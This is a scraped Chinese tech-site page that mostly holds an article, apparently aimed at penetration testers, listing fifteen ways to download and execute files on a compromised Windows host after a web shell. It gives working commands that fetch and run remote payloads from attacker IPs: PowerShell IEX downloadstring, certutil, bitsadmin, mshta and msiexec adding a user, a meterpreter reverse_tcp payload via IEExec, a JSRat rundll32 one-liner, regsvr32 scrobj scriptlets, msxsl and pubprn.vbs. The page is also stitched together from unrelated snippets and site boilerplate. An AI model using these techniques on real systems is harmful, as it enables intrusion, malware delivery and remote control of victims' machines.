精华内容
下载资源
问答
  • 2021-07-07 17:53:55
    • 使用基于ssh的pscp命令

      pscp root@192.168.1.200:/tmp/test.txt D:/桌面/
      

      注意:前提条件是已经安装Putty

    • 使用基于ftp的get命令 在这里插入图片描述
      在远程服务器下使用如下命令:

      get /tmp/test.txt
      

      文件自动保存至本地,目录查看:工具选项会话


    参考文献:

    • https://blog.csdn.net/qq_22326625/article/details/87618435
    更多相关内容
  • Windows Server 2003 镜像文件,镜像文件操作系统中的密钥这都在这个文档所保存的百度云中
  • 一、目的   拿到一台Windows主机,需要远程web站点上的文件到本地...下载文件Windows Server服务器 OS名称 Windows Server 2008 R2 Datacenter Windows Server 2012 R2 Datacenter 三、使用命令 3.1 ce

    一、目的

      拿到一台Windows主机,需要远程web站点上的文件到本地,可以参考以下方法!

    二、环境

    提供HTTP服务站点:

    • Kali:192.168.253.129 (kali搭建http服务,以msf生成的powershell payload为测试目标)
      在这里插入图片描述

    下载文件的Windows Server服务器

    OS名称
    Windows Server 2008 R2 Datacenter
    Windows Server 2012 R2 Datacenter

    三、使用命令

    3.1 certutil

    命令限制:适用于Server 2003以上版本,以及Windows Server 2003 / 2003 R2,带有SP1/SP2的Windows Server 2003

    certutil -urlcache -split -f <站点文件路径>
    

    在这里插入图片描述

    3.2 bitsadmin

    Tips:个别系统上拒绝访问添加文件,具体情况真实环境下自行测试

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.253.129/ps_reverse_shell.ps1" "c:\ps_reverse_shell.ps1"
    

    在这里插入图片描述

    3.3 powershell

    # 进入powershell
    powershell
    # 执行
    powershell (new-object Net.WebClient).DownloadFile('http://192.168.253.129/ps_reverse_shell.ps1','C:\ps_reverse_shell.ps1')
    

    在这里插入图片描述

    3.4 Python

    (如果目标系统中有python,可以使用此方法,urlopen中是要下载的地址,open后是要保存的文件名称,不指定路径就是当前路径)

    #!/usr/bin/python
    import urllib2
    u = urllib2.urlopen('http://10.32.22.238/index.html')
    localFile = open('index.html', 'w')
    localFile.write(u.read())
    localFile.close()
    

    注意shell权限问题,否则open不到本地
    在这里插入图片描述

    3.5 VBS脚本

    优点:兼容性强,windows都支持VBS脚本
    缺点: 字符太多,不方便准备vbs文件
    (下方URL地址需要更改,保存文件的地址需要更改,注意文件后缀需要和下载的一致)

    Set args = Wscript.Arguments
    Url = "http://10.32.22.238/index.html"
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", Url, False
    xHttp.Send
    with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\KevinMahone\1.html", 2 '
    end with
    

    Tips:如果在命令行下运行:(temp.vbs是上方的脚本文件)
    在这里插入图片描述

    展开全文
  • windows10百度网盘下载windows iso文件下载,无需积分。 链接:https://pan.baidu.com/s/1duHTmR9ZHfRqwretY2IvHg 提取码:6hi4 文件是由下图中官网的下载工具下载的。包含windows10 64位和windows10 32位。

    windows10百度网盘下载,windows iso文件下载

    windows10百度网盘下载,,windows iso文件下载,无需积分。
    链接:https://pan.baidu.com/s/1duHTmR9ZHfRqwretY2IvHg
    提取码:6hi4
    文件是由下图中官网的下载工具下载的。包含windows10 64位iso文件和windows10 32位iso文件。
    windows10系统安装包
    centos7下载

    展开全文
  • windows下C++利用CURL进行上传下载图片功能代码,主要说明可查看压缩包内的ReadMe说明文档,供初学者借鉴使用
  • Windows平台下c++ 对ftp和sftp文件以及文件夹下载上传整体的工程源代码。 内涵文档,测试用例 经过单元测试,集成测试 可靠,本人也是经过半个月的开发和封装
  • Windows文件下载执行的15种姿势

    万次阅读 2020-04-15 08:00:05
    当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一...

    当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?

    一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一种,远程下载文件到本地,然后再执行;第二种,远程下载执行,执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式另外呢,只要你所在服务器的环境支持,你也可以通过任何一门语言来实现它,这种方式暂不在本文的讨论范围之内。

    在这里,本文收集了15种常见的文件下载执行的方式,并结合具体案例,让我们一起来看看是怎么实现的吧。

      • PowerShell

      • Bitsadmin

      • certutil

      • wget

      • ipc$文件共享

      • FTP

      • TFTP

      • WinScp

      • msiexec

      • IEExec

      • mshta

      • rundll32

      • regsvr32

      • MSXSL.EXE

      • pubprn.vbs


      1、PowerShell

    PowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用。

    远程下载文件保存在本地:

    powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.28.128/imag/evil.txt','evil.exe')
    

    远程执行命令:

    powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/imag/evil.txt'))"
    
    

    2、Bitsadmin

    bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。

    bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt
    

    输入以上命令,成功下载文件。

    3、certutil

    用于备份证书服务,支持xp-win10都支持。由于certutil下载文件都会留下缓存,所以一般都建议下载完文件后对缓存进行删除。

    注:缓存目录为:

    ”%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content”
    
    #下载文件
    certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
    #删除缓存
    certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete
    

    4、wget

    Windows环境下,可上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。

    wget.exe下载:https://eternallybored.org/misc/wget/

    wget -O "evil.txt" http://192.168.28.128/imag/evil.txt
    
    

    5、ipc$文件共享

    IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

    #建立远程IPC连接net use \\192.168.28.128\ipc$ /user:administrator "abc123!"#复制远程文件到本地主机copy \\192.168.28.128\c$\2.txt D:\test
    
    

    6、FTP

    一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个 bash脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。

    ftp 127.0.0.1usernamepasswordget fileexit
    
    

    7、TFTP

    用来下载远程文件的最简单的网络协议,它基于UDP协议而实现

    tftp32服务端下载地址:http://tftpd32.jounin.net/tftpd32_download.html

    tftp -i 你的IP get 要下载文件 存放位置
    
    

    8、WinScp

    WinSCP是一个Windows环境下使用SSH的开源图形化SFTP客户端。

    #上传winscp.exe /console /command "option batch continue" "option confirm off" "open sftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "put D:\1.txt  /tmp/" "exit" /log=log_file.txt #下载winscp.exe /console /command "option batch continue" "option confirm off" "open sftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "get /tmp D:\test\app\" "exit" /log=log_file.tx
    

    使用winscp.exe 作为命令行参数执行远程上传/下载操作。

    9、msiexec

    msiexec 支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行:

    #生成msi包msfvenom -p windows/exec CMD='net user test abc123! /add' -f msi > evil.msi#远程执行msiexec /q /i http://192.168.28.128/evil.msi
    

    成功添加了一个test用户:

    10、IEExec

    IEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内。

    生成Payload:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.28.131 lport=4444 -f exe -o evil.exe
    

    使用管理员身份打开cmd,分别运行下面两条命令。

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727>caspol.exe -s offC:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe
    
    

    11、mshta

    mshta用于执行.hta文件,而hta是HTML Applocation 的缩写,也就是HTML应用程序。而hta中也支持VBS。所以我们可以利用hta来下载文件。

    mshta http://192.168.28.128/run.hta
    

    run.hta内容如下:

    <HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")objShell.Run "cmd.exe /c net user test password /add" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML>
    
    

    12、rundll32

    其实还是依赖于WScript.shell这个组件,在这里我们使用JSRat来做演示,JSRat是一个命令和控制框架,仅为rundll32.exe和regsvr32.exe生成恶意程序。

    项目地址:

    https://github.com/Hood3dRob1n/JSRat-Py.git
    

    步骤一:开始运行JSRat,监听本地8888端口。

    步骤二:通过url访问,可以查看恶意代码。

    复制代码如下:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    

    步骤三:在受害者PC运行该代码,将成功返回一个会话,如下图所示:

    13、regsvr32

    Regsvr32命令用于注册COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行

    在目标机上执行:

    regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll
    

    可以通过自己构造.sct文件,去下载执行我们的程序

    <?XML version="1.0"?><scriptlet><registration    progid="ShortJSRAT"    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >    <script language="JScript">        <![CDATA[            ps  = "cmd.exe /c calc.exe";            new ActiveXObject("WScript.Shell").Run(ps,0,true);        ]]></script></registration></scriptlet>
    

    执行命令,成功弹计算器:

    14、MSXSL.EXE

    msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。

    下载地址为:

    https://www.microsoft.com/en-us/download/details.aspx?id=21714
    

    msxsl.exe 需要接受两个文件,XML及XSL文件,可以远程加载,具体方式如下:

    msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl
    

    demo.xml

    <?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="exec.xsl" ?><customers><customer><name>Microsoft</name></customer></customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    
    
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
    
    
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    15、pubprn.vbs

    在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:\Windows\System32\Printing_Admin_Scripts\en-US,仔细观察该脚本可以发现其显然是由用户提供输入(通过命令行参数),之后再将参数传递给GetObject()

    "C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    test.sct

    <?XML version="1.0"?><scriptlet><registration    description="Bandit"    progid="Bandit"    version="1.00"    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"    remotable="true"    ></registration><script language="JScript"><![CDATA[        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>
    
    
    

    加入我的知识星球,获取更多安全干货。

    展开全文
  • windows xp系统system文件

    千次下载 热门讨论 2011-11-12 10:14:38
    windows/system32/config/system文件丢失或损坏,当windows xp系统system文件损坏或丢失,造成我们无法正常启动windows xp系统,我们可以用PE进入系统,把文件放到对应的位置windows/system32/config/system,再重新...
  • SCP 从Linux下载文件Windows本地

    万次阅读 多人点赞 2019-11-21 11:19:47
    scp linux_username@linux_ip:[linux上目标文件的路径] [指定下载windows本地的路径] 如:把linux上redis的配置文件6379.conf下载windows的桌面: scp jaychou@192.167.185.23:/etc/redis/6379.conf /c/Users/...
  • Windows 11(ISO) 官方镜像文件下载

    万次阅读 2021-10-24 22:51:59
    一.win11 (ISO)下载: 1.win11 (ISO) 镜像文件官方下载: ...2.win11 (ISO)镜像文件百度网盘下载: ...提取码:asdf 二.Win11升级教程: ...1.通过win11 安装助手来在线升级,在官方网站,下载Windows11安装助手: 2.在上面可
  • 官方下载windows10原版镜像 .iso文件

    万次阅读 多人点赞 2019-09-30 17:43:42
    先从官方下载上工具: 下载完了双击运行MediaCreationTool1903.exe,进入下载系统包的环节: 点接受: 切换成:如果是给本机装的话就不用改了 去掉默认勾选,然后选择你需要的系统: 找个地放: 在下载了: ...
  • Windows API 下载http文件

    千次阅读 2018-03-29 13:30:11
    打开http链接下载文档流程。#define _CRT_SECURE_NO_WARNINGS #include &lt;stdio.h&gt; #include &lt;tchar.h&gt; #include &lt;windows.h&gt; #include &lt;wininet.h&gt; #...
  • Shell上传下载文件Windows

    千次阅读 2022-03-09 10:07:55
    1.安装工具: yuminstall lrzsz 2.1接收文件:运行命令:rz 2.2上传文件:运行命令:sz file(例如:sz nginx.conf)
  • Windows 使用 CMD 命令行下载文件

    千次阅读 2021-03-03 12:01:03
    bitsadmin /transfer n 下载路径 存储路径 说明:存储路径一定是绝对路径,以及设置文件名
  • Windows文件服务器搭建

    千次阅读 2021-07-27 10:19:37
    入门级文件服务器搭建过程一、事前二、准备三、开始搭建3.1、环境安装3.2、创建用户3.2.1、更改用户密码3.2.2、删除用户3.3、创建组3.3.1、添加用户进组3.3.2、将用户从组中删除3.3.3、用户转移到其它组3.4、创建...
  • windows 命令行下载文件

    万次阅读 2018-10-09 11:39:07
    1、首先打开cmd命令行模式, Windows键+r,然后在里面输入cmd,按回车即可。这时候你就看见命令行模式了 2、在命令行中输入 start powershell就可启动powershell了 3、在powershell中我们输入一下命令 $client = ...
  • 本文主要介绍如何下载最新的Windows10最新镜像文件。 1.官网下载文件 1.从官网下载镜像文件: 点击“立即下载工具”。 2.下载的工具如下图所示: 3.双击运行下载的工具: 点击左下角的**“接受”。 4.选择安装...
  • 使用powershell附带的curl命令实现下载,而powershell是windows自带的, 格式: powershell curl -o "输出的文件名" "下载的url"。 文件名和url记得最好带双引号。 命令举例 下面举例下载迅雷安装包,脚本可以...
  • windows.h 下载

    千次下载 热门讨论 2010-10-14 00:39:54
    main header file for the Win32 API windows.h Abstract: Master include file for Windows applications.
  • windows下的文件复制到Linux下
  • MobaXterm实现linux和windows之间传输文件的具体步骤,有需要的小伙伴就和小编一起学习下
  • selenium弹窗之下载文件弹窗点击一、弹窗类型二、windows下载文件弹窗点击方法pyuserinput模块pyautogui模块 一、弹窗类型 一般说到selenium中的弹窗包括以下三种类型: 类型一:窗口柄 这种窗口常说的就是窗口句柄...
  • Linux 下载文件windows本地

    万次阅读 2018-09-27 11:13:45
    从Linux服务器下载文件到本地 使用xshell工具 使用xshell登录方便,操作也比较方面。传文件 就是使用rz,sz 首先...运行rz -be,会将windows文件传到linux服务器 运行sz filename,会将文件下载windows本地...
  • Quick Search是来自glarysoft公司的一款完全免费且小巧易于使用的极速windows文件搜索工具(知名的系统优化软件中的大师Glary Utilities Pro也是glarysoft公司的力作),界面极其简洁,因为该电脑文件快速查找工具仅...
  • 使用Windows的Powershell下载文件

    万次阅读 2018-06-08 18:40:30
    $client = new-object System.Net.WebClient$client.DownloadFile('#1', '#2')#1是需要下载文件的url#2是保存为本地文件的路径,包括文件名例如:$client.DownloadFile('... 'D:/562900.html')...
  • Windows下使用CMD下载网络文件

    万次阅读 2019-11-26 09:47:24
    一、启动PowerShell 1.使用Win(Windows徽标键)键+R键 打开运行框 2.输入Cmd然后回车(确定) 3.输入start powershell(回车) start powershell 二、开始下载 ...2.下载具体文件 ...
  • Windows Driver Developer Kit WIN DDK 3790.1830 微软驱动开发包官方下载地址,文件太大有230M,无法上传,特上传地址文档
  • 如何使用UUP来下载Windows 10 的安装镜像(Windows篇)

    千次阅读 热门讨论 2021-04-29 14:34:37
    如何使用UUP来下载Windows 10 的安装镜像(Windows篇) UUP全称为Unified Update Platform,即统一更新平台,是微软于2016年推出的更新模式,也是现在Windows的更新方式。
  • windows怎么从命令行下载文件

    万次阅读 2017-06-09 23:11:16
    1 打开 cmd.exewin+R 或者git的bush界面2 启动powershell在...3 下载操作在powershell.exe文件中输入$client = new-object System.Net.WebClient之后在输入$client.DownloadFile('#1', '#2')#1的位置填写文件下载地址,
  • Windows 10 下载官方正版ISO镜像文件

    万次阅读 多人点赞 2018-09-01 09:08:48
    进入微软官网Windows ...下载工具完成,打开Win10安装程序,下载ISO镜像文件 双击运行 稍等片刻 直接点击接受 选择第二个选项,点击下一步 可以默认直接点击下一步,也可以取消勾选“对这台电脑使用推...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,138,947
精华内容 455,578
关键字:

下载windows文档